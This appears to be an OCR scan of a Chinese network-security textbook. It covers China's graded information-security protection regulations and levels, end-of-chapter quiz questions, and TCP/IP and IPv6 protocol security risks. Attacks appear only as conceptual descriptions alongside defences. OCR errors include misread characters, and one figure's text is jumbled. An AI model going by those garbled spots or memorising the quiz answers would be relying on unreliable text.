部 门 在 国务 院 规定 的 职责 范围 内 做 好 安全 保护 的 有 关 工 作 。 


用 1. 信息 系统 建设 和 应 用 制度 


《安全 保护 条 例 ) 第 八条 规定 :“ 计 算 机 信息 系统 的 建设 和 应 用 ,应 当 遵 守法 律 , 行 政法 
规 和 国家 其 他 有 关 规 定 。 无 论 是 扩建 改建 或 新 建 信息 系统 ,还 是 设计 、 施 工 和 验收 ,都 应 当 
符合 国家 ,行业 部 门 或 地 方 政 府 制定 的 相关 法 律 法 规 和 技术 标准 。” 目 前 国家 标准 化 管理 委 
员 会 国务院 ,公安 部 .国家 保密 局 .国家 安全 部 ,工业 和 信息 化 部 、 中 国 互联 网 协会 等 部 门 也 
先后 颁布 了 多 条 信息 安全 技术 标准 条 目 和 法 律 法 规 。 随 着 信息 安全 新 问题 的 出 现 ,还 将 不 
断 颁布 新 的 信息 安全 技术 标准 和 法 律 法 规 。 





12. 信息 安全 等 级 保护 制度 


《安全 保护 条 例 ) 第 九条 规定 :“ 计 算 机 信息 系统 实行 安全 等 级 保护 。 安 全 等 级 的 划分 
标准 和 安全 等 级 保护 的 具体 办 法 ,由 公安 部 会 同 有 关 部 门 制定 ”安全 等 级 保护 的 关键 是 确 
定 不 同安 全 等 级 的 边界 ,只 有 对 不 同安 全 等 级 的 信息 系统 采用 相应 等 级 的 安全 保护 措施 , 才 
能 保障 国家 安全 、 维 护 社会 稳定 和 促进 信息 化 建设 健康 发 展 。 

信息 系统 安全 等 级 划分 涉及 信息 保密 安全 等 级 ,用户 授权 安全 等 级 ,物理 环境 安全 等 
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级 ,计算 机 系统 安全 等 级 和 机 构 安 全 等 级 等 多 方面 ,而 安全 等 级 保护 的 实施 与 法 律 法 规 、 技 
术 标 准 、 安 全 产品 ,过程 控制 和 监督 机 制 等 多 个 因素 密切 相关 。 

公安 部 及 国家 信息 安全 标准 化 技术 委员 会 依据 (安全 保护 条 例 ) 先 后 组 织 制定 了 一 系列 
信息 系统 安全 等 级 保护 国家 标准 ,主要 包括 《信息 系统 安全 保护 等 级 定 级 指南 兴 信 息 系统 安 
全 等 级 保护 测评 要 求 兴 信息 系统 安全 等 级 保护 测评 过 程 指南 ) 和 《信息 系统 等 级 保护 安全 设 
计 技 术 要 求 ) 等 。 


有 3. 安全 管理 与 计算 机 犯罪 报告 制度 


《安全 保护 条 例 ) 第 十 三 条 规定 :“ 计 算 机 信息 系统 的 使 用 单位 应 当 建 立 健全 安全 管理 
制度 ,负责 本 单位 计算 机 信息 系统 的 安全 保护 工作 。" 第 十 四 条 规定 :“ 对 计算 机 信息 系统 中 
发 生 的 案件 ,有 关 使 用 单位 应 当 在 24 小 时 内 向 当地 县 级 以 上 人 民政 府 公 安 机 关 报 告 ,” 因 不 
同 使 用 单位 对 应 的 机 构 安 全 数据 保密 安全 ,计算 机 系统 安全 ,物理 环境 安全 以 及 采用 的 安 
全 技术 等 级 各 不 相同 ,由 使 用 单位 制定 安全 管理 制度 ,有 利于 满足 安全 策略 的 均衡 性 和 时 效 
性 原则 。 

《全 国人 民 代表 大 会 常务 委员 会 关于 维护 互联 网 安全 的 决定 ) 从 保障 互联 网 运行 安全 、 
维护 国家 安全 和 社会 稳定 ,维护 社会 主义 市 场 经 济 秩序 和 社会 管理 秩序 保护 个 人 、 法 人 和 
其 他 组 织 的 人 身 、 财 产 等 合法 权利 方面 规定 了 15 种 计算 机 犯罪 行为 。 


有 4. 计算 机 病毒 与 有 害 数据 防护 制度 


《安全 保护 条 例 ) 第 十 五 条 规定 :“ 对 计算 机 病毒 和 危害 社会 公共 安全 的 其 他 有 害 数据 
的 防治 研究 工作 ,由 公安 部 归口 管理 .公安 部 第 51 号 令 ( 计 算 机 病毒 防治 管理 办 法 ) 对 计算 
机 病毒 概念 、 计 算 机 病毒 主管 部 门 ,传播 病毒 行为 .计算 机 病毒 疫情 和 违规 责任 等 事项 进行 
了 详细 的 说 明 。 
国家 计算 机 病毒 应 急 处 理 中 心 通过 (2011 年 全 国信 息 网 络 安全 差 误 与 计算 机 及 移动 终 
端 病毒 疫情 调查 分 析 报 告 ) 表 明 , 有 68. 83% 的 用 户 发 生 过 信息 网 络 安全 事件 。 安 全 漏洞 和 
弱 口 令 是 导致 发 生 网 络 安全 事件 的 主要 原因 。 











有 5. 安全 专用 产品 销售 许可 证 制度 


《安全 保护 条 例 ) 第 十 六 条 规定 :“ 国 家 对 计算 机 信息 系统 安全 专用 产品 的 销售 实行 许 
可 证 制度 。 具 体 办 法 由 公安 部 会 同 有 关 部 门 制定 .根据 此 规定 ,公安 部 出 台 了 第 32 号 令 
《计算 机 信息 系统 安全 专用 产品 检测 和 销售 许可 证 管理 办 法 )。 


PP 1.5.4 信息 安全 等 级 保护 法 规 和 标准 


信息 安全 等 级 保护 工作 是 我 国 为 保障 国家 安全 、 社 会 秩序 、 公 共 利 益 以 及 公民 、 法 人 和 
其 他 组 织 合 法 权益 强制 实施 的 一 项 基本 制度 。 依 据 ( 安 全 保护 条 例 》, 国 家 相关 部 门 先后 颁 
布 了 一 系列 法 规 和 技术 标准 。 
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由 1. 信息 系统 安全 等 级 保护 法 规 


为 落实 《安全 保护 条 例 ) 中 信息 安全 等 级 保护 条 款 , 公 安 部 .国家 保密 局 .国家 密码 管理 
局 和 国务 院 信 息 化 办 公 室 先 后 颁布 了 《关于 信息 安全 等 级 保护 工作 的 实施 意见 兴 信息 安全 
等 级 保护 管理 办 法 兴 关 于 开展 全 国 重要 信息 系统 安全 等 级 保护 定 级 工作 的 通知 兴 信息 安全 
等 级 保护 备案 实施 细则 兴 公 安 机 关 信 息 安 全 等 级 保护 检查 工作 规范 兴 关 于 加 强国 家 电子 政 
务工 程 建设 项 目 信息 安全 风险 评估 工作 的 通知 兴 关 于 开展 信息 安全 等 级 保护 安全 建设 整改 
工作 的 指导 意见 ) 等 法 规 。 

1) 信息 安全 等 级 保护 的 实施 

信息 安全 等 级 保护 的 内 容 主 要 分 为 五 个 等 级 。 

第 一 级 : 自主 保护 。 

第 二 级 : 指导 保护 。 

第 三 级 : 监督 保护 。 

第 四 级 : 强制 保护 。 

第 五 级 : 专 控 保护 等 级 。 

2) 信息 安全 等 级 保护 的 管理 

对 五 个 等 级 给 出 了 以 下 定义 。 

第 一 级 : 信息 系统 受到 破坏 后 ,会 对 公民 、 法 人 和 其 他 组 织 的 合法 权益 造成 损害 ,但 不 
损害 国家 安全 、 社 会 秩序 和 公共 利益 。 

第 二 级 : 信息 系统 受到 破坏 后 ,会 对 公民 、 法 人 和 其 他 组 织 的 合法 权益 产生 严重 损害 ， 
或 者 对 社会 秩序 和 公共 利益 造成 损害 ,但 不 损害 国家 安全 。 

第 三 级 : 信息 系统 受到 破坏 后 ,会 对 社会 秩序 和 公共 利益 造成 严重 损害 ,或 者 对 国家 安 
全 造成 损害 。 

第 四 级 : 信息 系统 受到 破坏 后 .会 对 社会 秩序 和 公共 利益 造成 特别 严重 损害 ,或 者 对 国 
家 安全 造成 严重 损害 。 

第 五 级 : 信息 系统 受到 破坏 后 ,会 对 国家 安全 造成 特别 严重 损害 。 

另外 ,对 等 级 保护 的 测评 .等 级 保护 的 安全 产品 的 选择 等 都 做 出 了 明确 的 规定 。 

3) 信息 安全 等 级 保护 的 建设 

(1) 等 级 保护 建设 整改 流程 。 

(2) 等 级 保护 建设 整改 标准 。 主 要 是 GB 17859 一 1999、GB/T 22239 一 2008 等 。 

(3) 等 级 保护 能 力 目标 。 明 确 了 各 级 信息 系统 应 该 达到 的 安全 保护 能 力 。 


有 2. 信息 系统 安全 等 级 保护 定 级 


信息 系统 的 安全 保护 等 级 由 两 个 定 级 要 素 决定 : 四 当 信 息 或 信息 系统 遭 到 破坏 后 是 否 
分 割 了 国家 安全 、 社 会 秩序 .公共 利益 以 及 公民 法 人 或 其 他 组 织 的 合法 权益 ; @ 造 成 分 割 
的 程度 ,包括 一 般 损害 、 严 重 损害 和 特别 严重 损害 。 

定 级 要 素 与 信息 系统 安全 保护 等 级 的 关系 如 表 1-7 所 示 。 
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表 1-7 定 级 要 素 与 信息 系统 安全 保护 等 级 的 关系 




















侵害 程度 
侵害 对 象 
一 般 损害 严重 损害 特别 严重 损害 
公民 ,法 人 或 其 他 组 织 的 合法 权益 第 一 级 第 二 级 第 三 级 
社会 秩序 公共 利益 第 二 级 第 三 级 第 四 级 
国家 安全 第 三 级 第 四 级 第 五 级 











Es. 信息 系统 安全 等 级 保护 基本 要 求 


基本 安全 要 求 主要 分 为 基本 技术 要 求 和 基本 管理 要 求 两 大 类 。 

基本 技术 要 求 主 要 从 物理 安全 、 网 络 安全 ,主机 安全 、 应 用 安全 和 数据 安全 方面 采取 技 
术 措 施 ,通过 在 信息 系统 中 部 署 软 硬 件 并 正确 的 配置 其 安全 功能 来 实现 。 

基本 管理 要 求 主 要 从 安全 管理 制度 ,安全 管理 机 构 、 人 员 安 全 管理 、 系 统 建设 管理 和 系 
统 运 维 管理 方面 采取 管理 措施 ,通过 控制 信息 系统 中 各 种 角色 的 活动 来 实现 。 基 本 技术 要 
求 和 基本 管理 要 求 是 确保 信息 系统 安全 不 可 分 割 的 两 个 部 分 。 

1) 基本 技术 要 求 控制 项 

物理 安全 控制 项 : 物理 位 置 的 选择 .物理 访问 控制 、 防 盗窃 和 防 破坏 、 防 雷击 .防火 、 防 
水 和 防潮 、 防 静电 、 温 湿度 控制 .电力 供应 和 电磁 防护 。 

网 络 安全 控制 项 : 结构 安全 ,访问 控制 ,安全 审计 、 边 界 完整 性 检查 、 入 侵 防范 、 恶 意 代 
码 防范 和 网 络 设备 防护 。 

主机 安全 控制 项 : 身份 鉴别 ,安全 标记 ,访问 控制 ,可 信和 路 径 、 安 全 审计 、 剩 余 信 息 保护 、 
入 侵 防范 .恶意 代码 防范 和 资源 控制 。 

应 用 安全 控制 项 : 身份 鉴别 .安全 标记 、 访 问 控制 .可 信 路 径 、 安 全 审计 、 剩 余 信 息 保 护 、 
通信 完整 性 .通信 保密 性 、 抗 抵赖 .软件 容错 和 资源 控制 。 

数据 安全 及 备份 恢复 控制 项 : 数据 完整 性 .数据 保密 性 、 备 份 和 恢复 。 

2) 基本 管理 要 求 控 制 项 

安全 管理 制度 控制 项 : 管理 制度 、 制 定 和 发 布 ,评审 和 修订 。 

安全 管理 机 构 控制 项 : 岗位 设置 、 人 员 配 备 、 授 权 和 审批 ,沟通 和 合作 、 审 核 和 检查 。 

人 员 安 全 管理 控制 项 : 人 员 录 用 、 人 员 离 岗 、 人 员 考 核 , 安 全 意识 教育 和 培训 、 外 部 人 员 
访问 管理 。 

系统 建设 管理 控制 项 : 系统 定 级 、 安 全 方案 设计 、 产 品 采购 和 使 用 、 自 行 软件 开发 .外 包 
软件 开发 .工程 实施 .测试 验收 .系统 交付 、 系 统 备 案 .等 级 测评 和 安全 服务 商 选择 。 

系统 运 维 管理 控制 项 : 环境 管理 资产 管理 .介质 管理 .设备 管理 ,监控 管理 和 安全 管理 
中 心 、 网 络 安全 管理 .系统 安全 管理 .恶意 代码 防范 管理 、 密 码 管理 .变更 管理 .备份 与 恢复 管 
理 、 安 全 事件 处 置 和 应 急 管理 。 
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且 . 选择 题 
(1) 计算 机 网 络 安全 是 指 利用 计算 机 网 络 管理 控制 和 技术 措施 ,保证 在 网 络 环境 中 数 
据 的 ` 完 整 性 、 网 络 服务 可 用 性 和 可 审查 性 受到 保护 。 
A. 保密 性 B. 抗 攻 击 性 
C. 网 络 服务 管理 性 D. 控制 安全 性 
(2) 网 络 安全 的 实质 和 关键 是 保护 网 络 的 安全 。 
A. 系统 B. 软件 C. 信息 D. 网 站 
(3) 实际 上 ,网 络 的 安全 问题 包括 两 方面 的 内 容 , 一 是 ; 二 是 网 络 的 信息 安全 。 
A. 网 络 服务 安全 B. 网 络 设 备 安全 
C. 网 络 环境 安全 D. 网 络 的 系统 安全 


(4) 在 短 时 间 内 向 网 络 中 的 某 台 服 务 器 发 送 大量 无 效 连接 请 求 ,导致 合法 用 户 和 暂时 无 
法 访问 服务 器 的 攻击 行为 是 破坏 了 。 
A. 保密 性 B. 完整 性 C. 可 用 性 D. 可 控 性 
(5) 如 果 访 问 者 有 意 避 开 系 统 的 访问 控制 机 制 , 则 该 访问 者 对 网 络 设备 及 资源 进行 非 
正常 使 用 属于 。 


A. 破坏 数据 完整 性 B. 非 授权 访问 
C. 信息 泄露 D. 拒绝 服务 攻击 
(6) 计算 机 网 络 安全 是 一 门 涉及 计算 机 科学 、 网 络 技 术 、 信 息 安 全 技术 、 通 信 技 术 、 应 用 
数学 密码 技术 和 信息 论 等 多 学 科 的 综合 性 学 科 , 是 的 重要 组 成 部 分 。 
A. 信息 安全 学 科 B. 计算 机 网 络 学 科 
C. 计算 机 学 科 D. 其 他 学 科 
(7) 在 网 络 安全 中 ,常用 的 关键 技术 可 以 归纳 为 三 大 类 。 
A. 计划 ,检测 ,防范 B. 规划 ,监督 .组织 
C. 检测 防范、 监督 D. 预防 保护 检测 跟踪 、 响 应 恢复 
12. 简 答 题 
(1) 说 明 威 胁 网 络 安全 的 因素 有 哪些 ? 


(2) 网 络 安全 的 目标 是 什么 ? 

(3) 网 络 管理 或 安全 管理 人 员 对 网 络 安全 的 侧重 点 是 什么 ? 

(4) 简 述 网 络 安全 关键 技术 的 内 容 。 

(5) 对 “公安 部 : 推进 网 站 信息 安全 等 级 保护 工作 ”, 你 的 看 法 是 什么 ?你 认为 应 该 怎么 
做 ? (参看 网 站 http://www. djbh. net/) 
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有 3. 操作 是 
(1) 登录 微软 安全 主页 (https://www. microsoft. com/zh-cn/security/default. aspx) 。 


阅读 2016 年 网 络 安全 趋势 分 析 报 告 .如 图 1-13 所 示 。 
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2016 年 网 络 安全 趋势 


阅读 我 们 针对 最 新 攻击 、 漏 洞 和 恶 
意 软件 的 威胁 格局 分 析 。 


下 载 电子 书 > 开始 评估 > 





图 1-13 微软 安全 首页 
(2) 在 微软 安全 技术 中 心 网 页 ,下载 Microsoft 安全 公告 摘要 (如 2017 年 1 月 ,https:// 


technet. microsoft. com/zh-cn/library/security/ms17-jan. aspx) ,如 图 1-14 所 示 。 
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图 1-14 微软 2017 年 1 月 发 布 的 安全 公告 
认真 阅读 ,分 析 公 告 中 的 执行 摘要 、 利 用 指数 、 受 影响 的 软件 等 信息 。 
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本 章 介绍 进程 端口 IP 地 址 以 及 常用 的 术语 和 命令 ,以 及 构建 虚拟 测试 环境 的 过 程 。 


多 > 知识 点 

(1) IP 地 址 、 端 口 。 
(2) 黑客 常用 术语 。 
(3) 常用 网 络 命令 。 
(4) 网 络 协议 安全 性 。 
(5) 虚拟 测试 环境 。 


局 同 教 学 B 标 


(1) 了 解 网 络 协议 的 安全 风险 。 
(2) 了 解 IPv6 的 安全 性 。 

(3) 掌握 IP 地 址 和 端口 号 。 
(4) 了 解 黑客 常用 术语 。 

(5) 掌握 常用 网 络 命令 的 使 用 。 
(6) 掌握 虚拟 测试 环境 的 构建 。 


weer 
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PP 2.1.1 网 络 协议 安全 性 概述 


【案例 2-1】 美国 军事 网 站 出 现 重大 泄密 ,总 统 专机 结构 上 曝光。 美国 空军 一 个 网 站 ,在 
2006 年 4 月 出 现 重大 泄密 ,透露 出 总 统 专机 “空军 一 号 ” 反 导 防御 系统 等 机 密 信 息 。 从 此 网 
站 的 一 份 政府 文件 中 ,可 以 轻易 地 浏览 详细 的 内 部 结构 图 ,包括 专机 内 特工 人 员 所 处 的 位 
置 ,以 及 为 专机 提供 服务 的 供 氧 地 点 ,声称 丽 怖 分 子 可 能 引爆 其 氧气 锥 。 


有 1. 网 络 协 议 的 安全 风险 


计算 机 网 络 节点 之 间 的 互联 ,通信 与 数据 交换 主要 依靠 其 协议 实现 ,网 络 协议 是 计算 机 
网 络 极为 重要 的 组 成 部 分 ,在 设计 之 初 由 于 只 注重 异 构 网 的 互联 和 功能 的 实现 ,忽略 了 其 安 
全 性 问题 ,而且 ,网 络 各 层 协 议 为 一 个 开放 体系 ,具有 计算 机 网 络 及 其 部 件 所 具有 的 基本 功 
能 ,致使 其 开放 性 及 缺陷 将 网 络 系统 处 于 安全 风险 和 隐患 的 环境 。 

计算 机 网 络 协议 的 安全 风险 大 致 可 归结 为 以 下 3 方面 。 

(1) 网 络 协议 自身 的 设计 缺陷 和 实现 中 存在 的 一 些 安全 漏洞 ,容易 受到 侵入 和 攻击 。 

(2) 网 络 协议 根本 不 具有 有 效 认证 机 制 和 验证 通信 双方 真实 性 的 功能 。 

(3) 计算 机 网 络 协议 缺乏 保密 机 制 ,不 具有 保护 网 上 数据 机 密 性 的 功能 。 





12. TCP/IP 层次 安全 性 


计算 机 网 络 安全 由 多 个 安全 层 构成 ,每 一 个 安全 层 都 是 一 个 包含 多 个 特征 的 实体 。 在 
TCP/IP 的 不 同 层 次 上 ,可 以 增加 不 同 的 安全 策略 和 安全 性 。 如 在 传输 层 提 供 安全 套 接 层 
SSL(Secure Sockets Layer) 服务, 以 及 其 继任 者 传输 层 安全 (Transport Layer Security， 
TLS) ,是 为 网 络 通信 提供 安全 及 数据 完整 性 的 一 种 安全 协议 ,在 网 络 层 提供 虚拟 专用 网 
VPN(Virtual Private Network) 技 术 等 。 下 面 分 别 介 绍 TCP/IP 不 同 层次 的 安全 性 及 提高 
各 层 安 全 性 的 技术 和 方法 ,TCP/IP 网 络 安全 技术 层次 体系 如 图 2-1 所 示 。 

1) TCP/IP 物理 层 的 安全 性 

TCP/IP 模型 的 网 络 接口 层 对 应 着 OSI 模型 的 物理 层 和 数据 链 路 层 。 物 理 层 安全 问题 
是 指 由 网 络 环境 及 物理 特性 产生 的 网 络 设施 和 线路 安全 性 ,致使 网 络 系统 出 现 安全 风险 ,如 
设备 被 盗 .意外 故障 .设备 损坏 与 老化 、 信 息 探测 与 窃听 等 。 由 于 以 太 网 上 存在 交换 设备 并 
采用 广播 方式 ,可 能 在 某 个 广播 域 中 侦 听 、 窍 取 并 分 析 信 息 。 为 此 ,保护 链 路 上 的 设施 安全 
极为 重要 ,物理 层 的 安全 措施 相对 较 少 , 最 好 采用 “隔离 技术 ”将 每 两 个 网 络 保证 在 逻辑 上 能 
够 连通 ,同时 从 物理 上 隔断 .并 加 强 实体 安全 管理 与 维护 。 

2) TCP/IP 网 络 层 的 安全 性 

网 络 层 的 主要 功能 用 于 数据 包 的 网 络 传输 ,其 中 IP 协议 是 整个 TCP/IP 协议 体系 结构 
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应 用 层 安 全 协议 (如 S/MIME 、SHTTP、SNMPv3) 
应 用 层 | 用 户 身份 | 授权 与 代理 服务 第 安全 服务 
认证 “| 器 防火 墙 如 CA 三 管理 
方 入 
公 侵 
传输 层 安全 协议 (如 SSL/TLS、PCT、SSH、SOCKS)| ”证 检 | 
传输 层 如。 | 响 市 并 | 安全 机 制 
电路 级 防火 入 | 息 二 委 | 管理 | 系 
网 络 层 安全 协议 (如 IPSec) 对 | ns 委 
(IP) | 认证 | 防火 墙 如 VPN 字 泽 | 管理 
ipSee-AH| 防火 寺 等 日 四 
名 描 
相 邻 节点 
网 络 | 同 的 认证 | 划分 | 。 MDpc | 点 对 点 加 密 
接口 层 全 人 物理 隔绝 MAC ~ | (MS-MPPE) 物理 保护 
认证 | 访问 控制 | 数据 完整 性 | 数据 机 密 性 | 抗 抵赖 性 | 可 控 性 ”可 审计 性 ”可 用 性 




















图 2-1 TCP/IP 网 络 安 全 技术 层次 体系 


的 重要 基础 ,TCP/IP 中 所 有 协议 的 数据 都 以 IP 数据 报 形式 进行 传输 。 

TCP/IP 协议 族 常用 的 两 种 IP 版 本 是 IPv4 和 IPv6。IPv4 在 设计 之 初 根本 没有 考虑 到 
网 络 安全 问题 ,IP 包 本 身 不 具有 任何 安全 特性 ,从 而 导致 在 网 络 上 传输 的 数据 包 很 容易 汇 
露 或 受到 攻击 ,IP 欺骗 和 ICMP 攻击 都 是 针对 IP 层 的 攻击 手段 。 如 伪造 IP 包 地 址 ,拦截 、 
窍 取 , 算 改 、 重 播 等 。 因 此 ,通信 双方 无 法 保证 收 到 IP 数据 报 的 真实 性 。IPv6 简化 了 IPv4 
中 的 IP 头 结构 ,并 增加 了 对 安全 性 的 设计 。 

3) TCP/IP 传输 层 的 安全 性 

传输 层 的 安全 问题 主要 有 传输 与 控制 安全 ,数据 交换 与 认证 安全 ,数据 保密 性 与 完整 性 
等 安全 风险 。 包 括 传输 控制 协议 TCP 和 用 户 数 据 报 协 议 UDP, 其 安全 措施 取决 于 具体 的 
协议 。TCP 是 一 个 面向 连接 的 协议 ,用 于 多 数 的 互联 网 服务 ,如 HTTP、FTP 和 SMTP。 为 
了 保证 传输 层 的 安全 研发 了 安全 套 接 层 协 议 SSL, 现 称 传输 层 安全 协议 TLS, 包 括 SSL 握 
手 协 议和 SSL 记录 协议 。 前 者 用 于 数据 认证 和 数据 加 密 的 过 程 , 利 用 多 种 有 效 密 钥 交换 算 
法 和 机 制 。 后 者 对 应 用 程序 提供 的 信息 分 段 、 压 缩 、 认 证 和 加 密 。SSL 协议 提供 了 身份 验 
证 ,完整 性 检验 和 保密 性 服务 , 密 钥 管理 的 安全 服务 可 为 各 种 传输 协议 重复 使 用 。 

4) TCP/IP 应 用 层 的 安全 性 

应 用 层 中 利用 TCP/IP 协议 运行 和 管理 的 程序 较 多 。 网 络 安全 问题 主要 出 现在 需要 重 
点 解决 的 常用 应 用 系统 ,包括 HTTP、FTP、SMTP、DNS、Telnet 等 。 

(1) 超 文本 传送 协议 (HTTP)。HTTP 是 互联 网 上 应 用 最 广泛 的 协议 。 使 用 80 端口 
建立 连接 ,并 进行 应 用 程序 浏览 数据 传输 和 对 外 服务 。 其 客户 端 使 用 浏览 器 访问 并 接收 从 
服务 器 返回 的 Web 网 页 。 若 下 载 具 有 破坏 性 的 ActiveX 控件 或 Java Applet 插件 ,这 些 程 
序 在 用 户 终端 运行 并 含有 恶意 代码 ,应 注意 不 要 下 载 未 经 过 检验 的 程序 。 
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(2) 文件 传送 协议 (FTP)。FTP 是 建立 在 TCP/IP 连接 上 的 文件 发 送 与 接收 协议 。 由 
服务 器 和 客户 端 组 成 ,各 TCP/IP 主机 都 有 内 置 的 FTP 客户 端 , 且 多 数 服务 器 都 有 FTP 程 
序 。FTP 常用 20 和 21 端口 ,由 21 端口 建立 连接 ,使 连接 端口 在 整个 FTP 会 话 中 保持 开 
放 , 用 于 客户 端 和 服务 器 之 间 发 送 控制 信息 和 客户 端 命令 。 在 FTP 主动 模式 下 ,常用 20 端 
口 进行 数据 传输 ,在 客户 端 和 服务 器 之 间 所 有 传输 的 文件 都 要 建立 数据 连接 。 

当 FTP 服务 器 需要 认证 时 ,所 有 的 用 户 名 和 密码 都 以 明文 传输 。 搜 寻 人 允许 匿名 连接 并 
有 写 权限 的 FTP 服务 器 是 受 攻击 的 手段 之 一 。 确 定 目 标 后 ,上 传 大 量 繁杂 信息 塞 满 整个 存 
储 空间 ,致使 操作 系统 运行 缓慢 , 且 日 志文 件 无 空间 记录 其 他 事件 ,使 其 借 机 进入 操作 系统 
或 其 他 服务 的 日 志文 件 并 逃避 检测 及 追踪 。 

(3) 简单 邮件 传送 协议 (SMTP)。 黑 客 可 利用 SMTP 对 E-mail 服务 器 进行 干扰 和 破 
坏 。 如 发 送 大 量 的 垃圾 邮件 等 ,使 服务 器 不 能 正常 处 理 合法 用 户 的 请 求 ,导致 拒绝 服务 。 目 
前 , 绝 大 部 分 的 计算 机 病毒 基本 都 是 通过 邮件 或 其 附件 进行 传播 的 。 因 此 ,SMTP 服务 器 应 
增加 过 滤 .扫描 及 设置 拒绝 指定 邮件 等 功能 。 

(4) 域名 系统 CDNS) 。 计 算 机 网 络 通过 DNS 在 解析 域名 请 求 时 使 用 53 端口 ,在 进行 区 
域 传输 时 使 用 TCP 53 端口 。 黑 客 可 以 进行 区 域 传输 或 利用 攻击 DNS 服务 器 窃取 区 域 文 
件 , 并 从 中 窃取 系统 的 IP 地址 和 主机 名 。 可 利用 保护 DNS 服务 器 并 阻止 各 种 区 域 传输 ,还 
可 通过 配置 系统 限制 接受 特定 主机 的 区 域 传输 。 

(5) 远程 登录 协议 (Telnet)。 其 功能 是 进行 远程 终端 登录 访问 , 曾 用 于 管理 UNIX 设 
备 。 允 许 远程 用 户 登录 是 产生 Telnet 安全 问题 的 主要 问题 ,另外 ,Telnet 以 明文 方式 发 送 
所 有 用 户 名 和 密码 ,给 非法 者 以 可 乘 之 机 ,只 要 利用 一 个 Telnet 会 话 即 可 远程 作案 , 现 已 成 
为 防范 重点 。 


> 2.1.2 IPv6 的 安全 性 概述 


IPv6 是 在 IPv4 基础 上 改进 的 下 一 代 互联 网 协议 ,对 其 研究 和 建设 正 逐 步 成 为 信息 技术 
领域 的 热点 之 一 ,IPv6 的 网 络 安全 已 成 为 下 一 代 互 联网 研究 中 一 个 重要 领域 。 


Li IPv6 的 优势 及 特点 


1) 扩展 地 址 空间 及 应 用 

IPv6 最 初 是 为 了 解决 因 互联 网 迅速 发 展 使 IPv4 地 址 空间 被 耗 尽 问题 ,以 免 妨 碍 互联 网 
的 进一步 扩展 。IPv4 采用 32 位 地 址 长 度 , 大 约 只 有 43 亿 个 地 址 ,而 IPv6 采用 128 位 地 址 
长 度 , 极 大 地 扩展 了 IP 地址 空间 。 

IPv6 的 设计 还 解决 了 IPv4 的 其 他 问题 ,如 端 到 端 IP 连接 ,安全 性 、 服 务 质量 (QoS) 多 
播 、 移 动 性 和 即 插 即 用 等 功效 。IPv6 还 对 报头 进行 了 重新 设计 ,由 一 个 简化 长 度 固定 的 基 
本 报头 和 多 个 可 选 的 扩展 报头 组 成 。 既 可 加 快 路 由 速度 ,又 能 灵活 地 支持 多 种 应 用 ,便于 扩 
展 新 的 应 用 。IPv4 和 IPv6 的 报头 如 图 2-2 和 图 2-3 所 示 。 

2) 提高 网 络 整 体 性 能 

IPv6 的 数据 包 可 以 超过 64KB, 使 应 用 程序 可 利用 最 大 传输 单元 (MTU) 获 得 更 快 、 更 
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版 本 (4 位 ) ”| 头 长 度 (4 位 ) | 服务 类 型 (8 位 ) | 封包 总 长 度 (16 位 ) 
封包 标识 (16 位 ) 标志 G 位 ) ”| 片段 偏 移 地 址 13 位 ) 
存活 时 间 (8 位 ) | 协议 (8 位 ) 检验 和 (16 位 ) 
来 源 IP 地 址 (32 位 ) 
目的 IP 地 址 (32 位 ) 
选项 (可 选 ) | 填充 (可 选 ) 
数据 



































图 2-2 IPv4 的 IP 报 头 





版 本 号 | 业务 流 类 别 流标 签 
净 荷 长 度 下 一 跳 跳 数 限制 














源 地 址 





目的 地 址 








图 2-3 IPv6 的 基本 报头 


可 靠 的 数据 传输 ,并 在 设计 上 改进 了 选 路 结构 ,采用 简化 的 报头 定 长 结构 和 更 合理 的 分 段 方 
法 ,使 路 由 器 加 快 数 据 包 处 理 速 度 , 从 而 提高 了 转发 效率 ,并 提高 了 网 络 的 整体 吞吐 量 等 性 能 。 

3) 加 强 网 络 安 全 性 能 

IPv6 以 内 柚 安 全 机 制 可 强制 实现 IP 安全 协议 IPSec, 提 供 支持 数据 源 发 认证 ,完整 性 
和 保密 性 的 能 力 , 同 时 可 抗 重 放 攻 击 。 安 全 机 制 主要 由 两 个 扩展 报头 实现 : 认证 头 AH 
(Authentication Header) 和 封装 安全 载荷 ESP(Encapsulation Security Payload)。AH 具有 
三 项 功能 : 保护 数据 完整 性 (不 被 非法 算 改 ); 数据 源 发 认证 (防止 源 地 址 假冒 ) 和 抗 重 放 攻 
击 ; IPv6 对 安全 机 制 的 增强 可 简化 实现 安全 的 虚拟 专用 网 (VPN)。ESP 在 AH 所 实现 的 
安全 功能 基础 上 ,还 增加 了 对 数据 保密 性 的 支持 。AH 和 ESP 都 有 传输 模式 和 隧道 模式 两 
种 使 用 方式 。 

4) 提供 更 好 的 服务 质量 

IPv6 在 分 组 的 头 部 中 定义 业务 流 类 别 字段 和 流标 签字 段 两 个 重要 参数 ,以 提供 对 服务 
质量 (Quality of Service,QoS) 的 支持 。 业 务 流 类 别 字段 将 IP 分 组 的 优先 级 分 为 16 个 等 
级 。 对 于 需要 特殊 QoS 的 业务 ,可 在 IP 数据 包 中 设置 相应 的 优先 级 ,路 由 器 根据 IP 包 的 优 
先 级 来 分 别 对 这 些 数据 进行 不 同 处 理 。 

5) 实现 更 好 的 组 播 功 能 

组 播 是 一 种 将 信息 传递 给 已 登记 且 计划 接收 该 消息 的 主机 功能 ,可 同时 给 大 量 用 户 传 
递 数据 ,传递 过 程 只 占用 一 些 公 共 或 专用 带宽 开销 而 不 在 整个 网 络 广播 ,以 减少 带宽 。IPv6 
还 具有 限制 组 播 传递 范围 的 一 些 安全 特性 。 
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6) 支持 即 插 即 用 和 移动 性 

当 联网 设备 接 人 网 络 后 ,以 自动 配置 可 自动 获取 IP 地 址 和 必要 的 参数 ,实现 即 插 即 用 ， 
简化 了 网 络 管理 ,易于 支持 移动 节点 。IPv6 不 仅 从 IPv4 中 借鉴 了 很 多 概念 和 术语 ,还 提供 
了 移动 IPv6 所 需 的 新 功能 。 

7) 提供 必 选 的 资源 预 留 协 议 (Resource Reservation Protocol,RSVP) 功 能 

用 户 可 在 从 源 点 到 目的 地 的 路 由 器 上 预 留 带宽 ,以 便 提 供 确保 服务 质量 的 图 像 和 其 他 
实时 业务 。 


有 2. IPv4 与 IPv6 安全 问题 比较 


通过 比较 IPv4 和 IPv6 下 的 安全 问题 ,发 现 有 些 安全 问题 的 原理 和 特征 基本 无 变化 ,有 
的 地 方 引进 IPv6 后 安全 问题 的 原理 和 特征 却 发 生 很 大 变化 。 主 要 包括 以 下 内 容 。 

(1) 与 IPv4 下 的 情况 比较 ,原理 和 特征 基本 未 发 生变 化 。 安 全 问题 可 划分 为 三 类 : 网 
